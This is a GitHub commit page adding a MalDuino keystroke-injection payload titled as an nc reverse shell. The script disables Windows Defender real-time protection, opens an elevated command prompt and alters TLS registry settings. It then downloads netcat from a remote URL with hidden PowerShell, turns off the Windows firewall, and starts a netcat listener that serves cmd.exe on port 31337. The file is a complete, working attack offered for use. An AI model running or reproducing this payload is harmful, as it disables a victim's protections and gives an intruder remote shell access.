Skip to content

Commit 5b7677d

Browse files
pcmarconpcmarcon
authored
Update and rename nc.txt to malduino_nc_reverse_shell.txt
1 parent 78679cf commit 5b7677d

File tree

2 files changed

+70
-82
lines changed

2 files changed

+70
-82
lines changed

malduino_nc_reverse_shell.txt

Lines changed: 70 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,70 @@
1+
DELAY 1000
2+
REM Open Windows Defender settings
3+
CTRL ESC
4+
DELAY 1000
5+
STRING Windows Defender Settings
6+
DELAY 100
7+
ENTER
8+
REM Navigate to realtime protection and disable it
9+
DELAY 1000
10+
ENTER
11+
DELAY 1000
12+
ENTER
13+
DELAY 1000
14+
TAB
15+
DELAY 250
16+
TAB
17+
DELAY 250
18+
TAB
19+
DELAY 250
20+
TAB
21+
ENTER
22+
DELAY 1000
23+
SPACE
24+
DELAY 1000
25+
ALT y
26+
DELAY 500
27+
ALT F4
28+
DELAY 100
29+
ALT F4
30+
DELAY 100
31+
GUI r
32+
DELAY 200
33+
STRING cmd
34+
DELAY 200
35+
CTRL SHIFT ENTER
36+
DELAY 500
37+
ALT y
38+
DELAY 500
39+
ESC
40+
STRING cd %temp%
41+
ENTER
42+
43+
STRING powershell.exe -executionpolicy bypass -noprofile -windowstyle hidden {New-Item 'HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Protocols\TLS 1.3\Server' -Force}
44+
DELAY 100
45+
ENTER
46+
STRING powershell.exe -executionpolicy bypass -noprofile -windowstyle hidden {New-ItemProperty -path 'HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Protocols\TLS 1.3\Server' -name 'Enabled' -value '0' -PropertyType 'DWord' -Force}
47+
DELAY 100
48+
ENTER
49+
STRING powershell.exe -executionpolicy bypass -noprofile -windowstyle hidden {New-ItemProperty -path 'HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Protocols\TLS 1.3\Server' -name 'DisabledByDefault' -value 1 -PropertyType 'DWord' -Force}
50+
DELAY 100
51+
ENTER
52+
STRING powershell.exe -executionpolicy bypass -noprofile -windowstyle hidden {New-Item 'HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Protocols\TLS 1.3\Client' -Force}
53+
DELAY 100
54+
ENTER
55+
STRING powershell.exe -executionpolicy bypass -noprofile -windowstyle hidden {reg add HKLM\SOFTWARE\Microsoft\.NETFramework\v4.0.30319 /v SystemDefaultTlsVersions /t REG_DWORD /d 1 /f /reg:64}
56+
DELAY 100
57+
ENTER
58+
STRING powershell.exe -executionpolicy bypass -noprofile -windowstyle hidden "(New-Object System.Net.WebClient).DownloadFile('https://raw.githubusercontent.com/pcmarcon/malduino-payload-samples/master/bin/nc.bin', 'nc.exe')"
59+
DELAY 100
60+
ENTER
61+
DELAY 2000
62+
STRING netsh advfirewall set allprofiles state off
63+
DELAY 100
64+
ENTER
65+
STRING powershell.exe -executionpolicy bypass -noprofile -windowstyle hidden "%temp%\nc.exe -Lp 31337 -vv -e cmd.exe"
66+
DELAY 100
67+
ENTER
68+
STRING exit
69+
DELAY 100
70+
ENTER

nc.txt

Lines changed: 0 additions & 82 deletions
This file was deleted.

0 commit comments

Comments
 (0)